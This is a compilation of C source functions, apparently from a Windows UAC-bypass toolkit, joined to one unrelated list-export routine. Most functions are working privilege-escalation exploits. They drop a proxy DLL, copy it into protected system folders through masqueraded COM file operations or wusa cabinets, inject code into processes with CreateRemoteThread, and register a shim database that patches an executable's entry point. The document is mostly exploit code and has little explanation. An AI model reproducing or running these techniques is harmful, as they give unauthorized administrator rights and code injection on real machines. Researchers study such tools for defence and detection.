/* * SdtSaveListToFile * * Purpose: * * Dump table to the selected file * */ VOID SdtSaveListToFile( _In_ HWND hwndDlg ) { WCHAR ch; INT BufferSize = 0; INT numitems; INT row, subitem; SIZE_T sz, k; LPWSTR pItem = NULL; HCURSOR hSaveCursor; HCURSOR hHourGlass; WCHAR szTempBuffer[MAX_PATH + 1]; RtlSecureZeroMemory(szTempBuffer, sizeof(szTempBuffer)); _strcpy(szTempBuffer, TEXT("list.txt")); if (supSaveDialogExecute(hwndDlg, (LPWSTR)&szTempBuffer, TEXT("Text files\0*.txt\0\0"))) { hHourGlass = LoadCursorW(NULL, IDC_WAIT); ch = (WCHAR)0xFEFF; supWriteBufferToFile(szTempBuffer, &ch, sizeof(WCHAR), FALSE, FALSE); SetCapture(hwndDlg); hSaveCursor = SetCursor(hHourGlass); numitems = ListView_GetItemCount(SdtDlgContext.ListView); for (row = 0; row < numitems; row++) { output[0] = 0; for (subitem = 0; subitem < SdtDlgContext.lvColumnCount; subitem++) { sz = 0; pItem = supGetItemText(SdtDlgContext.ListView, row, subitem, &sz); if (pItem) { _strcat(output, pItem); HeapFree(GetProcessHeap(), 0, pItem); } if (subitem == 1) { for (k = 54; k > sz / sizeof(WCHAR); k--) { _strcat(output, TEXT(" ")); } } else { _strcat(output, TEXT("\t")); } } _strcat(output, L"\r\n"); BufferSize = (INT)_strlen(output); supWriteBufferToFile(szTempBuffer, output, BufferSize * sizeof(WCHAR), FALSE, TRUE); } SetCursor(hSaveCursor); ReleaseCapture(); } }
/* * ucmStandardAutoElevation2 * * Purpose: * * Bypass UAC by abusing appinfo g_lpAutoApproveEXEList * * UAC contain whitelist of trusted fusion processes with only names and no other special restrictions * Most of them unknown shit and list does not properly handled by system itself, use this fact. * */ BOOL ucmStandardAutoElevation2( CONST PVOID ProxyDll, DWORD ProxyDllSize ) { BOOL cond = FALSE, bResult = FALSE; WCHAR SourceFilePathAndName[MAX_PATH + 1]; WCHAR DestinationFilePathAndName[MAX_PATH + 1]; do { //source filename of dll RtlSecureZeroMemory(SourceFilePathAndName, sizeof(SourceFilePathAndName)); _strcpy(SourceFilePathAndName, g_ctx.szTempDirectory); _strcat(SourceFilePathAndName, UNBCL_DLL); if (!supWriteBufferToFile(SourceFilePathAndName, ProxyDll, ProxyDllSize)) { break; } //copy %temp\unbcl.dll -> system32\unbcl.dll if (!ucmMasqueradedMoveFileCOM(SourceFilePathAndName, g_ctx.szSystemDirectory)) { break; } //source filename of process RtlSecureZeroMemory(SourceFilePathAndName, sizeof(SourceFilePathAndName)); _strcpy(SourceFilePathAndName, g_ctx.szSystemDirectory); _strcat(SourceFilePathAndName, SYSPREP_DIR); _strcat(SourceFilePathAndName, SYSPREP_EXE); RtlSecureZeroMemory(DestinationFilePathAndName, sizeof(DestinationFilePathAndName)); _strcpy(DestinationFilePathAndName, g_ctx.szTempDirectory); _strcat(DestinationFilePathAndName, OOBE_EXE); //system32\sysprep\sysprep.exe -> temp\oobe.exe if (!CopyFile(SourceFilePathAndName, DestinationFilePathAndName, FALSE)) { break; } //temp\oobe.exe -> system32\oobe.exe if (!ucmMasqueradedMoveFileCOM(DestinationFilePathAndName, g_ctx.szSystemDirectory)) { break; } RtlSecureZeroMemory(DestinationFilePathAndName, sizeof(DestinationFilePathAndName)); _strcpy(DestinationFilePathAndName, g_ctx.szSystemDirectory); _strcat(DestinationFilePathAndName, OOBE_EXE); bResult = supRunProcess(DestinationFilePathAndName, NULL); } while (cond); return bResult; }
/* * ucmCreateCabinetForSingleFile * * Purpose: * * Build cabinet for usage in methods where required 1 file. * */ BOOL ucmCreateCabinetForSingleFile( LPWSTR lpSourceDll, PVOID ProxyDll, DWORD ProxyDllSize ) { BOOL cond = FALSE, bResult = FALSE; CABDATA *Cabinet = NULL; LPWSTR lpFileName; WCHAR szMsuFileName[MAX_PATH * 2]; if ((ProxyDll == NULL) || (ProxyDllSize == 0)) { return FALSE; } do { //drop proxy dll if (!supWriteBufferToFile(lpSourceDll, ProxyDll, ProxyDllSize)) { break; } //build cabinet RtlSecureZeroMemory(szMsuFileName, sizeof(szMsuFileName)); _strcpy(szMsuFileName, g_ctx.szTempDirectory); _strcat(szMsuFileName, ELLOCNAK_MSU); Cabinet = cabCreate(szMsuFileName); if (Cabinet == NULL) break; lpFileName = _filename(lpSourceDll); //put file without compression bResult = cabAddFile(Cabinet, lpSourceDll, lpFileName); cabClose(Cabinet); } while (cond); return bResult; }
/* * ucmH1N1Method * * Purpose: * * Bypass UAC by abusing OOBE.exe backdoor hardcoded in appinfo.dll * */ BOOL ucmH1N1Method( PVOID ProxyDll, DWORD ProxyDllSize ) { BOOL cond = FALSE, bResult = FALSE; DWORD c; HANDLE hProcess = NULL, hRemoteThread = NULL; HINSTANCE selfmodule = GetModuleHandle(NULL); PIMAGE_DOS_HEADER pdosh = (PIMAGE_DOS_HEADER)selfmodule; PIMAGE_FILE_HEADER fh = (PIMAGE_FILE_HEADER)((char *)pdosh + pdosh->e_lfanew + sizeof(DWORD)); PIMAGE_OPTIONAL_HEADER opth = (PIMAGE_OPTIONAL_HEADER)((char *)fh + sizeof(IMAGE_FILE_HEADER)); LPVOID remotebuffer = NULL, newEp, newDp; SIZE_T NumberOfBytesWritten = 0; PELOAD_PARAMETERS_4 elvpar = &g_ElevParamsH1N1; LPVOID elevproc = ucmElevatedLaunchProc; WCHAR szBuffer[MAX_PATH * 2]; WCHAR szDest[MAX_PATH + 1]; WCHAR szSource[MAX_PATH + 1]; if ( (ProxyDll == NULL) || (ProxyDllSize == 0) ) { return bResult; } do { //put Fubuki dll as netutils to %temp% RtlSecureZeroMemory(szBuffer, sizeof(szBuffer)); _strcpy_w(szBuffer, TEMPDIR); _strcat_w(szBuffer, L"netutils.dll"); RtlSecureZeroMemory(szSource, sizeof(szSource)); if (ExpandEnvironmentStrings(szBuffer, szSource, MAX_PATH) == 0) { break; } if (!supWriteBufferToFile(szSource, ProxyDll, ProxyDllSize)) { OutputDebugString(TEXT("[UCM] Failed to drop dll")); break; } else { OutputDebugStringW(TEXT("[UCM] Dll dropped successfully")); } //copy dll to wbem target folder RtlSecureZeroMemory(szBuffer, sizeof(szBuffer)); if (ExpandEnvironmentStringsW(WBEMDIR, szBuffer, MAX_PATH) == 0) { break; } //note: uacmAutoElevateCopyFile uses injection to explorer.exe bResult = ucmAutoElevateCopyFile(szSource, szBuffer); if (!bResult) { break; } //copy 1st stage target process RtlSecureZeroMemory(szSource, sizeof(szSource)); if (ExpandEnvironmentStrings(L"%systemroot%\\system32\\credwiz.exe", szSource, MAX_PATH) == 0) { break; } RtlSecureZeroMemory(szDest, sizeof(szDest)); if (ExpandEnvironmentStrings(L"%temp%\\oobe.exe", szDest, MAX_PATH) == 0) { break; } if (!CopyFile(szSource, szDest, FALSE)) { break; } bResult = ucmAutoElevateCopyFile(szDest, szBuffer); if (!bResult) { break; } //setup basic shellcode routines RtlSecureZeroMemory(&g_ElevParamsH1N1, sizeof(g_ElevParamsH1N1)); elvpar->xShellExecuteExW = (pfnShellExecuteExW)GetProcAddress(g_ldp.hShell32, "ShellExecuteExW"); elvpar->xWaitForSingleObject = (pfnWaitForSingleObject)GetProcAddress(g_ldp.hKernel32, "WaitForSingleObject"); elvpar->xCloseHandle = (pfnCloseHandle)GetProcAddress(g_ldp.hKernel32, "CloseHandle"); //set shellcode 2nd stage target process RtlSecureZeroMemory(szBuffer, sizeof(szBuffer)); _strcpy_w(elvpar->szTargetApp, g_ldp.szSystemDirectory); //c:\windows\system32\wbem\oobe.exe _strcat_w(elvpar->szTargetApp, L"\\wbem\\oobe.exe"); _strcpy_w(elvpar->szVerb, L"runas"); _strcpy_w(szBuffer, g_ldp.szSystemDirectory); //c:\windows\system32\credwiz.exe _strcat_w(szBuffer, L"\\credwiz.exe"); //run 1st stage target process hProcess = supRunProcessEx(szBuffer, NULL, NULL); if (hProcess == NULL) { OutputDebugString(TEXT("[UCM] Cannot open target process.")); break; } remotebuffer = VirtualAllocEx(hProcess, NULL, (SIZE_T)opth->SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (remotebuffer == NULL) { OutputDebugString(TEXT("[UCM] Cannot allocate memory in target process.")); break; } if (!WriteProcessMemory(hProcess, remotebuffer, selfmodule, opth->SizeOfImage, &NumberOfBytesWritten)) { OutputDebugString(TEXT("[UCM] Cannot write to the target process memory.")); break; } newEp = (char *)remotebuffer + ((char *)elevproc - (char *)selfmodule); newDp = (char *)remotebuffer + ((char *)elvpar - (char *)selfmodule); hRemoteThread = CreateRemoteThread(hProcess, NULL, 0, newEp, newDp, 0, &c); bResult = (hRemoteThread != NULL); if (bResult) { WaitForSingleObject(hRemoteThread, INFINITE); CloseHandle(hRemoteThread); } } while (cond); if (hProcess != NULL) { TerminateProcess(hProcess, 0); CloseHandle(hProcess); } return bResult; }
/* * ucmMMCMethod * * Purpose: * * Bypass UAC by abusing MMC.exe backdoor hardcoded in appinfo.dll * */ BOOL ucmMMCMethod( LPWSTR lpTargetDll, PVOID ProxyDll, DWORD ProxyDllSize ) { BOOL bResult = FALSE, cond = FALSE; WCHAR szSource[MAX_PATH + 1]; WCHAR szDest[MAX_PATH + 1]; WCHAR szBuffer[MAX_PATH + 1]; if ( (ProxyDll == NULL) || (ProxyDllSize == 0) || (lpTargetDll == NULL) ) { return bResult; } if (_strlen_w(lpTargetDll) > 100) { return bResult; } do { //put target dll RtlSecureZeroMemory(szBuffer, sizeof(szBuffer)); _strcpy_w(szBuffer, TEMPDIR); _strcat_w(szBuffer, lpTargetDll); //expand string for proxy dll RtlSecureZeroMemory(szSource, sizeof(szSource)); if (ExpandEnvironmentStrings(szBuffer, szSource, MAX_PATH) == 0) { break; } //write proxy dll to disk if (!supWriteBufferToFile(szSource, ProxyDll, ProxyDllSize)) { OutputDebugString(TEXT("[UCM] Failed to drop dll")); break; } else { OutputDebugStringW(TEXT("[UCM] Dll dropped successfully")); } //expand string for target dir RtlSecureZeroMemory(szDest, sizeof(szDest)); if (ExpandEnvironmentStringsW(SYSTEMROOTDIR, szDest, MAX_PATH) == 0) { break; } //drop fubuki to system32 bResult = ucmAutoElevateCopyFile(szSource, szDest); if (!bResult) { break; } //run mmc console //because of mmc harcoded backdoor uac will autoelevate mmc with valid and trusted MS command //event viewer will attempt to load not existing dll, so we will give him our little friend bResult = supRunProcess(L"mmc.exe", L"eventvwr.msc"); } while (cond); return bResult; }
/* * ucmWinSATMethod * * Purpose: * * Acquire elevation through abusing APPINFO.DLL whitelisting model logic and wusa installer/IFileOperation autoelevation. * Slightly modified target and proxydll can work almost with every autoelevated/whitelisted application. * This method uses advantage of wusa to write to the protected folders, but can be adapted to IFileOperation too. * WinSAT used for demonstration purposes only. * */ BOOL ucmWinSATMethod( LPWSTR lpTargetDll, PVOID ProxyDll, DWORD ProxyDllSize, BOOL UseWusa ) { BOOL bResult = FALSE, cond = FALSE; CABDATA *Cabinet = NULL; WCHAR szSource[MAX_PATH + 1]; WCHAR szDest[MAX_PATH + 1]; WCHAR szBuffer[MAX_PATH + 1]; if ( (ProxyDll == NULL) || (ProxyDllSize == 0) || (lpTargetDll == NULL) ) { return bResult; } if (_strlen_w(lpTargetDll) > 100) { return bResult; } RtlSecureZeroMemory(szSource, sizeof(szSource)); RtlSecureZeroMemory(szDest, sizeof(szDest)); do { if (ExpandEnvironmentStrings(L"%systemroot%\\system32\\winsat.exe", szSource, MAX_PATH) == 0) { break; } if (ExpandEnvironmentStrings(L"%temp%\\winsat.exe", szDest, MAX_PATH) == 0) { break; } // Copy winsat to temp directory if (!CopyFile(szSource, szDest, FALSE)) { break; } //put target dll RtlSecureZeroMemory(szBuffer, sizeof(szBuffer)); _strcpy_w(szBuffer, TEMPDIR); _strcat_w(szBuffer, lpTargetDll); //expand string for proxy dll RtlSecureZeroMemory(szSource, sizeof(szSource)); if (ExpandEnvironmentStrings(szBuffer, szSource, MAX_PATH) == 0) { break; } //write proxy dll to disk if (!supWriteBufferToFile(szSource, ProxyDll, ProxyDllSize)) { OutputDebugString(TEXT("[UCM] Failed to drop dll")); break; } else { OutputDebugStringW(TEXT("[UCM] Dll dropped successfully")); } // // Two options: use wusa installer or IFileOperation // if ( UseWusa ) { //build cabinet RtlSecureZeroMemory(szBuffer, sizeof(szBuffer)); if (ExpandEnvironmentStringsW(T_MSUPACKAGE_NAME, szBuffer, MAX_PATH) == 0) { break; } Cabinet = cabCreate(szBuffer); if (Cabinet) { //expand string for winsat.exe if (ExpandEnvironmentStrings(L"%temp%\\winsat.exe", szDest, MAX_PATH) == 0) { break; } //put proxy dll inside cabinet cabAddFile(Cabinet, szSource, lpTargetDll); //put winsat.exe cabAddFile(Cabinet, szDest, L"winsat.exe"); cabClose(Cabinet); Cabinet = NULL; } else { OutputDebugString(TEXT("[UCM] Error creating cab archive")); break; } //extract package ucmWusaExtractPackage(T_WINSAT_CMDLINE); RtlSecureZeroMemory(szBuffer, sizeof(szBuffer)); if (ExpandEnvironmentStrings(T_WINSAT_TARGET, szBuffer, MAX_PATH) == 0) { break; } bResult = supRunProcess(szBuffer, NULL); } else { //wusa extract banned, switch to IFileOperation. RtlSecureZeroMemory(szBuffer, sizeof(szBuffer)); if (ExpandEnvironmentStringsW(M1W7_TARGETDIR, szBuffer, MAX_PATH) == 0) { break; } bResult = ucmAutoElevateCopyFile(szSource, szBuffer); if (!bResult) { break; } bResult = ucmAutoElevateCopyFile(szDest, szBuffer); if (!bResult) { break; } Sleep(0); //run winsat RtlSecureZeroMemory(szBuffer, sizeof(szBuffer)); if (ExpandEnvironmentStrings(T_WINSAT_TARGET, szBuffer, MAX_PATH) == 0) { break; } bResult = supRunProcess(szBuffer, NULL); //cleanup of the above files must be done by payload code } } while (cond); if (Cabinet) { cabClose(Cabinet); } //remove trash from %temp% if (szDest[0] != 0) { DeleteFileW(szDest); } if (szSource[0] != 0) { DeleteFileW(szSource); } return bResult; }
/* * ucmStandardAutoElevation * * Purpose: * * Leo Davidson AutoElevation method with derivatives. * * M1W7 - Original Leo Davidson concept. * M1W8 - Windows 8.1 adapted M1W7 (bypassing sysprep embedded manifest dlls redirection). * M1W7T - Leo Davidson concept with different target dll, used by Win32/Tilon. * M1W10 - Windows 10 adapter M1W7. * M1WALL - WinNT/Pitou derivative from Leo Davidson concept. * */ BOOL ucmStandardAutoElevation( DWORD dwType, CONST PVOID ProxyDll, DWORD ProxyDllSize ) { BOOL cond = FALSE, bResult = FALSE; HINSTANCE hKrnl, hOle32, hShell32; LPWSTR lpSourceDll, lpTargetDir, lpTargetProcess; WCHAR szBuffer[MAX_PATH + 1]; switch (dwType) { case METHOD_SYSPREP1: lpSourceDll = M1W7_SOURCEDLL; lpTargetDir = M1W7_TARGETDIR; lpTargetProcess = M1W7_TARGETPROCESS; break; case METHOD_SYSPREP2: lpSourceDll = M1W8_SOURCEDLL; lpTargetDir = M1W7_TARGETDIR; lpTargetProcess = M1W7_TARGETPROCESS; break; case METHOD_SYSPREP3: lpSourceDll = M1W10_SOURCEDLL; lpTargetDir = M1W7_TARGETDIR; lpTargetProcess = M1W7_TARGETPROCESS; break; case METHOD_OOBE: lpSourceDll = M1WALL_SOURCEDLL; lpTargetDir = M1WALL_TARGETDIR; lpTargetProcess = M1WALL_TARGETPROCESS; break; case METHOD_TILON: lpSourceDll = M1W7T_SOURCEDLL; lpTargetDir = M1W7_TARGETDIR; lpTargetProcess = M1W7_TARGETPROCESS; break; default: return FALSE; } do { // load/reference required dlls hKrnl = GetModuleHandle(KERNEL32DLL); hOle32 = GetModuleHandle(OLE32DLL); if (hOle32 == NULL) { hOle32 = LoadLibrary(OLE32DLL); if (hOle32 == NULL) { break; } } hShell32 = GetModuleHandle(SHELL32DLL); if (hShell32 == NULL) { hShell32 = LoadLibrary(SHELL32DLL); if (hShell32 == NULL) { break; } } //source filename if (ExpandEnvironmentStringsW(lpSourceDll, g_ElevParams.SourceFilePathAndName, MAX_PATH) == 0) { break; } OutputDebugStringW(g_ElevParams.SourceFilePathAndName); if (!supWriteBufferToFile(g_ElevParams.SourceFilePathAndName, ProxyDll, ProxyDllSize)) { break; } //dest directory RtlSecureZeroMemory(szBuffer, sizeof(szBuffer)); _strcpy_w(szBuffer, lpTargetDir); if (ExpandEnvironmentStringsW(szBuffer, g_ElevParams.DestinationDir, MAX_PATH) == 0) { break; } OutputDebugStringW(g_ElevParams.DestinationDir); //target RtlSecureZeroMemory(szBuffer, sizeof(szBuffer)); _strcpy_w(szBuffer, lpTargetProcess); if (ExpandEnvironmentStringsW(szBuffer, g_ElevParams.ExePathAndName, MAX_PATH) == 0) { break; } OutputDebugStringW(g_ElevParams.ExePathAndName); //elevation moniker _strcpy_w(g_ElevParams.EleMoniker, L"Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}"); g_ElevParams.xIID = IID_IFileOperation; g_ElevParams.xIID_IShellItem = IID_IShellItem; g_ElevParams.xCLSID = CLSID_FileOperation; g_ElevParams.xCoInitialize = (pfnCoInitialize)GetProcAddress(hOle32, "CoInitialize"); g_ElevParams.xCoCreateInstance = (pfnCoCreateInstance)GetProcAddress(hOle32, "CoCreateInstance"); g_ElevParams.xCoGetObject = (pfnCoGetObject)GetProcAddress(hOle32, "CoGetObject"); g_ElevParams.xCoUninitialize = (pfnCoUninitialize)GetProcAddress(hOle32, "CoUninitialize"); g_ElevParams.xSHCreateItemFromParsingName = (pfnSHCreateItemFromParsingName)GetProcAddress(hShell32, "SHCreateItemFromParsingName"); g_ElevParams.xShellExecuteExW = (pfnShellExecuteExW)GetProcAddress(hShell32, "ShellExecuteExW"); g_ElevParams.xWaitForSingleObject = (pfnWaitForSingleObject)GetProcAddress(hKrnl, "WaitForSingleObject"); g_ElevParams.xCloseHandle = (pfnCloseHandle)GetProcAddress(hKrnl, "CloseHandle"); bResult = ucmInjectExplorer(&g_ElevParams, ucmElevatedLoadProc); } while (cond); return bResult; }
/* * ucmShimPatch * * Purpose: * * Build, register shim patch database and execute target app with forced Entry Point Override. * Aside from UAC bypass this is also dll injection technique. * */ BOOL ucmShimPatch( CONST PVOID ProxyDll, DWORD ProxyDllSize ) { BOOL bResult = FALSE, cond = FALSE; PDB hpdb; GUID dbGUID, exeGUID; WCHAR szTempDirectory[MAX_PATH * 2]; WCHAR szShimDbPath[MAX_PATH * 2]; WCHAR szSdbinstPath[MAX_PATH * 2]; WCHAR szSystemDirectory[MAX_PATH]; DWORD indexid = MAXDWORD, sz, epRVA = 0; TAGID dbrf, libref, patchref, exeref, matchfileref, patchfileref; PBYTE tmp; PPATCHBITS patchbits; RtlSecureZeroMemory(szSdbinstPath, sizeof(szSdbinstPath)); RtlSecureZeroMemory(szShimDbPath, sizeof(szShimDbPath)); do { if (!GetSystemDirectoryW(szSystemDirectory, MAX_PATH)) { break; } wsprintfW(szSdbinstPath, SHIM_SDBINSTALLER, szSystemDirectory); if (CoCreateGuid(&dbGUID) != S_OK) { break; } if (CoCreateGuid(&exeGUID) != S_OK) { break; } RtlSecureZeroMemory(szTempDirectory, sizeof(szTempDirectory)); if (!GetTempPathW(MAX_PATH, szTempDirectory)) { break; } // drop Fubuki RtlSecureZeroMemory(szShimDbPath, sizeof(szShimDbPath)); wsprintfW(szShimDbPath, L"%wsr3.dll", szTempDirectory); if (!supWriteBufferToFile(szShimDbPath, ProxyDll, ProxyDllSize)) { break; } RtlSecureZeroMemory(szShimDbPath, sizeof(szShimDbPath)); wsprintfW(szShimDbPath, L"%wsamuzani.sdb", szTempDirectory); hpdb = SdbCreateDatabase(szShimDbPath, DOS_PATH); if (hpdb == NULL) { break; } if (!SdbDeclareIndex(hpdb, TAG_EXE, TAG_NAME, 1, TRUE, &indexid)) { break; } if (!SdbStartIndexing(hpdb, indexid)) { break; } SdbStopIndexing(hpdb, indexid); SdbCommitIndexes(hpdb); // begin DATABASE { dbrf = SdbBeginWriteListTag(hpdb, TAG_DATABASE); if (!SdbWriteStringTag(hpdb, TAG_NAME, L"amuzani")) { break; } SdbWriteBinaryTag(hpdb, TAG_DATABASE_ID, (PBYTE)&dbGUID, sizeof(GUID)); SdbWriteDWORDTag(hpdb, TAG_OS_PLATFORM, 0x1); //<- win32 // begin LIBRARY { libref = SdbBeginWriteListTag(hpdb, TAG_LIBRARY); patchref = SdbBeginWriteListTag(hpdb, TAG_PATCH); // begin LIBRARY-PATCH SdbWriteStringTag(hpdb, TAG_NAME, SHIMPATCH_BINARYNAME); // query EP RVA for target RtlSecureZeroMemory(szTempDirectory, sizeof(szTempDirectory)); wsprintfW(szTempDirectory, L"%ws\\%ws", szSystemDirectory, SHIMPATCH_EXENAME); epRVA = supQueryEntryPointRVA(szTempDirectory); if (epRVA == 0) { break; } tmp = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 32 * 1024); if (tmp != NULL) { patchbits = (PPATCHBITS)tmp; sz = 0; patchbits->Opcode = PATCH_REPLACE; patchbits->RVA = epRVA; _strcpy_w(patchbits->ModuleName, SHIMPATCH_EXENAME); supCopyMemory((char *)&patchbits->Pattern, sizeof(patchcode32), patchcode32, sizeof(patchcode32)); patchbits->PatternSize = sizeof(patchcode32); patchbits->ActionSize = sizeof(PATCHBITS) + patchbits->PatternSize; sz += patchbits->ActionSize; SdbWriteBinaryTag(hpdb, TAG_PATCH_BITS, tmp, sz); HeapFree(GetProcessHeap(), 0, tmp); } SdbEndWriteListTag(hpdb, patchref); // end LIBRARY-PATCH // end LIBRARY SdbEndWriteListTag(hpdb, libref); SdbStartIndexing(hpdb, indexid); // begin EXE { exeref = SdbBeginWriteListTag(hpdb, TAG_EXE); SdbWriteStringTag(hpdb, TAG_NAME, SHIMPATCH_EXENAME); SdbWriteStringTag(hpdb, TAG_APP_NAME, SHIMPATCH_EXENAME); SdbWriteBinaryTag(hpdb, TAG_EXE_ID, (PBYTE)&exeGUID, sizeof(GUID)); // begin MATCH { matchfileref = SdbBeginWriteListTag(hpdb, TAG_MATCHING_FILE); SdbWriteStringTag(hpdb, TAG_NAME, SHIMPATCH_EXENAME); SdbWriteStringTag(hpdb, TAG_COMPANY_NAME, SHIMPATCH_MSFTFULL); SdbEndWriteListTag(hpdb, matchfileref); // } end MATCH patchfileref = SdbBeginWriteListTag(hpdb, TAG_PATCH_REF); SdbWriteStringTag(hpdb, TAG_NAME, SHIMPATCH_BINARYNAME); SdbWriteDWORDTag(hpdb, TAG_PATCH_TAGID, patchref); SdbEndWriteListTag(hpdb, patchfileref); SdbEndWriteListTag(hpdb, exeref); // } end EXE // } end DATABASE SdbEndWriteListTag(hpdb, dbrf); SdbCloseDatabaseWrite(hpdb); // Register db and run target. bResult = ucmRegisterAndRunTarget(szSystemDirectory, szSdbinstPath, szShimDbPath, L"%ws\\iscsicli.exe", TRUE); } while (cond); return bResult; }
/* * ucmStandardAutoElevation * * Purpose: * * Leo Davidson AutoElevation method with derivatives. * * UacMethodSysprep1 - Original Leo Davidson concept. * UacMethodSysprep2 - Windows 8.1 adapted UacMethodSysprep1 (bypassing sysprep embedded manifest dlls redirection). * UacMethodTilon - Leo Davidson concept with different target dll, used by Win32/Tilon. * UacMethodSysprep3 - Windows 10 TH1 adapted UacMethodSysprep1. * UacMethodOobe - WinNT/Pitou derivative from Leo Davidson concept. * */ BOOL ucmStandardAutoElevation( UACBYPASSMETHOD Method, CONST PVOID ProxyDll, DWORD ProxyDllSize ) { BOOL cond = FALSE, bResult = FALSE; WCHAR szSourceDll[MAX_PATH * 2]; WCHAR szTargetDir[MAX_PATH * 2]; WCHAR szTargetProcess[MAX_PATH * 2]; _strcpy(szSourceDll, g_ctx.szTempDirectory); _strcpy(szTargetDir, g_ctx.szSystemDirectory); _strcpy(szTargetProcess, g_ctx.szSystemDirectory); switch (Method) { case UacMethodSysprep1: //%temp%\cryptbase.dll _strcat(szSourceDll, CRYPTBASE_DLL); //%systemroot%\system32\sysprep _strcat(szTargetDir, SYSPREP_DIR); //%systemroot%\system32\sysprep\sysprep.exe _strcat(szTargetProcess, SYSPREP_DIR); _strcat(szTargetProcess, SYSPREP_EXE); break; case UacMethodSysprep2: //%temp\\shcore.dll _strcat(szSourceDll, SHCORE_DLL); //%systemroot%\system32\sysprep _strcat(szTargetDir, SYSPREP_DIR); //%systemroot%\system32\sysprep\sysprep.exe _strcat(szTargetProcess, SYSPREP_DIR); _strcat(szTargetProcess, SYSPREP_EXE); break; case UacMethodSysprep3: //%temp%\dbgcore.dll _strcat(szSourceDll, DBGCORE_DLL); //%systemroot%\system32\sysprep _strcat(szTargetDir, SYSPREP_DIR); //%systemroot%\system32\sysprep\sysprep.exe _strcat(szTargetProcess, SYSPREP_DIR); _strcat(szTargetProcess, SYSPREP_EXE); break; case UacMethodOobe: //%temp%\wdscore.dll _strcat(szSourceDll, WDSCORE_DLL); //%systemroot%\system32\oobe\" _strcat(szTargetDir, L"oobe\\"); //%systemroot%\system32\oobe\setupsqm.exe _strcat(szTargetProcess, SETUPSQM_EXE); break; case UacMethodTilon: //%temp%\ActionQueue.dll _strcat(szSourceDll, ACTIONQUEUE_DLL); //%systemroot%\system32\sysprep _strcat(szTargetDir, SYSPREP_DIR); //%systemroot%\system32\sysprep\sysprep.exe _strcat(szTargetProcess, SYSPREP_DIR); _strcat(szTargetProcess, SYSPREP_EXE); break; default: return FALSE; } do { if (!supWriteBufferToFile(szSourceDll, ProxyDll, ProxyDllSize)) break; if (!ucmMasqueradedMoveFileCOM(szSourceDll, szTargetDir)) break; bResult = supRunProcess(szTargetProcess, NULL); } while (cond); return bResult; }